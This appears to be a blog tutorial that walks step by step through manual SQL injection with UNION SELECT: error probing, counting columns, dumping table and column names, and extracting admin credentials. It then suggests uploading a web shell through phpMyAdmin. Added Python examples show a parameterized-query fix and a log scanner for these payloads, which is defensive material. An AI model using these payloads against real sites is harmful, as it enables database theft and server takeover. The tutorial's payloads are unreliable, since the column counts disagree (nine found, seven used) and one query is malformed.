Guide: How to Manually Perform SQL Injection with UNION SELECT

August 11, 2015 | Views: 29813


This is not shared with you so that you’ll go out now and do something illegal. I want you to read this, learn from it, and practice it on your own, or use it with others who have given you a thumbs up to try it out.

Hello to all of you and welcome to another contribution. This time, I’ll share how to manually perform SQL Injection using the UNION SELECT method.

 

For all of you who do SQL Injection with open-source tools or other software that does the work for you: if you don’t already know how to do SQL Injection manually, it’s time for you to learn it. Nothing is easy; there are still a lot of things to remember. So, like everyone else, take notes to remember this because.

Our target today is: https://target.com/index.php?id=5

We want to find out if our target is vulnerable to SQL injection. Let’s check whether a MySQL error comes up when we add a single quote ( ' ) to the parameter: https://target.com/index.php?id=5'

…And it did!

You have an error in your SQL syntax; check the manual that corresponds to your….. Continued

So, it’s time to make sure we can actually work this out the way we want. We’re going to work with ORDER BY, which helps us find out how many columns there are: ORDER BY n sorts by the n-th column of the query’s result, so a number higher than the column count produces an error. Let’s start with 5 to see whether the page loads normally or an error comes up because the number is too high.

  • https://target.com/index.php?id=5 ORDER BY 5-- (it still looks all normal here; let’s increase the number by 5 more.)
  • https://target.com/index.php?id=5 ORDER BY 10-- (oops, something happened here; it comes up with this error…)

Unknown column '10' in 'order clause'

Alright, so instead of 10 we try 9--, for example, and whoops, the error disappears. We now know there are 9 columns on our target. It’s time to take the next step: since we know the column count, we want to know which column we’re going to inject into. For that, we’re going to work with UNION SELECT.

  • https://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,5,6,7,8,9-- (Something came up: some numbers. It’s easy here! There are small/normal numbers and ones that are different: the numbers in bold.)

5

3

We know the column we’re going to work with here is 5. So, let’s inject it now by doing the following:

  • http://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(table_name),6,7 from information_schema.tables

CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS

You will see much more than this, and it will be different from what you see here, but one thing is one hundred percent certain: you’re inside. Now, we want to go even further. To see the valuable stuff we can actually work with, we’re going to type:

  • http://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_schema=database()--

ID,USERNAME,LIST,PASSWORD,MAIL,LINKS,…….

And, if it’s even worse, PHPMYADMIN, MYSQL, CREDITCARDS, PSN and such can be there also. It’s a very dangerous situation for the target. We have now decided that we want to get the USERNAME:PASSWORD from our target.

  • http://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7 from database--

administrator:badsecurity
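The requests above work because the page builds its query by pasting the id parameter into the SQL text. As an added example (not from the original post), the following Python code puts that pattern beside a bound-parameter version; SQLite stands in for MySQL, and the articles/users tables and all function names are hypothetical.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the target database (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO articles VALUES (5, 'Hello', 'Article five');
        INSERT INTO users VALUES ('administrator', 'badsecurity');
    """)
    return db

def fetch_vulnerable(db, raw_id):
    """Vulnerable: the parameter is pasted into the SQL text and parsed as SQL."""
    return db.execute(
        "SELECT id, title, body FROM articles WHERE id = " + raw_id).fetchall()

def fetch_bound(db, raw_id):
    """Bound parameter: the value travels as data and is never parsed as SQL."""
    return db.execute(
        "SELECT id, title, body FROM articles WHERE id = ?", (raw_id,)).fetchall()

def fetch_hardened(db, raw_id):
    """Bound parameter plus an allow-list check on the expected type."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None  # the caller should answer 400 without touching the DB
    return fetch_bound(db, int(raw_id))

# Same shape as the tutorial's request, adapted to the three-column sample table.
INJECTED = "-5 UNION SELECT 1,2,username || ':' || password FROM users--"

def demo():
    db = make_db()
    return {
        "vulnerable_normal": fetch_vulnerable(db, "5"),
        "vulnerable_injected": fetch_vulnerable(db, INJECTED),
        "bound_injected": fetch_bound(db, INJECTED),
        "hardened_normal": fetch_hardened(db, "5"),
        "hardened_injected": fetch_hardened(db, INJECTED),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:20} {rows}")
```

With the bound parameter the injected text is compared to the id column as a plain value and matches no row; the type check rejects it before any query runs.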

This target stores a plaintext password. Oops, so dumb! In other situations, you’ll normally see the password as an MD5 hash, and some others are encrypted. We now have the username:password. Let’s find the administration login and use it. If the target has phpMyAdmin, it is just a matter of actually finding the phpMyAdmin panel. From there, you can do something very dangerous also by adding a CMD shell. Then, you can actually upload another shell with more features.
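Each step of this walkthrough leaves a recognisable request in the web server's access log. The following added example (not part of the original post) flags those requests and groups the stages seen per source address; the log lines are constructed, and the rule and function names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.4 - - [11/Aug/2015:10:00:00 +0000] "GET /index.php?id=5 HTTP/1.1" 200 5120
203.0.113.7 - - [11/Aug/2015:10:00:04 +0000] "GET /index.php?id=5%27 HTTP/1.1" 500 310
203.0.113.7 - - [11/Aug/2015:10:00:09 +0000] "GET /index.php?id=5%20ORDER%20BY%2010-- HTTP/1.1" 500 298
203.0.113.7 - - [11/Aug/2015:10:00:15 +0000] "GET /index.php?id=-5+UNION+SELECT+1,2,3,4,group_concat(table_name),6,7+from+information_schema.tables HTTP/1.1" 200 9001
198.51.100.4 - - [11/Aug/2015:10:00:20 +0000] "GET /search.php?q=trade+union+members HTTP/1.1" 200 4800
""".splitlines()

# One rule per stage of the walkthrough; applied to the decoded query string.
RULES = {
    "quote_probe": re.compile(r"(?:^|&)id=[^&]*'"),
    "order_by_probe": re.compile(r"\border by \d+"),
    "union_select": re.compile(r"\bunion (?:all )?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\."),
    "group_concat": re.compile(r"\bgroup_concat\("),
}
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3}) ')

def scan(lines):
    """Return (ip, status, [rule names]) for every request that matches a rule."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        # Decode %xx and '+', lowercase, collapse whitespace before matching.
        query = unquote_plus(target.partition("?")[2]).lower()
        query = re.sub(r"\s+", " ", query)
        matched = [name for name, rx in RULES.items() if rx.search(query)]
        if matched:
            hits.append((ip, status, matched))
    return hits

def stages_by_ip(hits):
    """Distinct stages per source; several stages from one IP is a strong signal."""
    stages = defaultdict(set)
    for ip, _status, matched in hits:
        stages[ip].update(matched)
    return {ip: sorted(names) for ip, names in stages.items()}

if __name__ == "__main__":
    print(stages_by_ip(scan(SAMPLE_LOG)))
```

The benign search for "trade union members" is not flagged, because the rule requires the two keywords together rather than either word alone.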

As a little extra, I uploaded a pastebin to show you some additional methods beyond UNION SELECT (but not in a tutorial, just an overview).

http://pastebin.com/ASmH7LRj

 

Any questions, feel free to PM me!

 

Image Credit: @infosectdk

27 Comments
  1. Glad that you all like this share. Hope that everyone can use this and hopefully also perfectly execute. Else pm me in advance if any problems.

    Best regards, Kevin Mark.
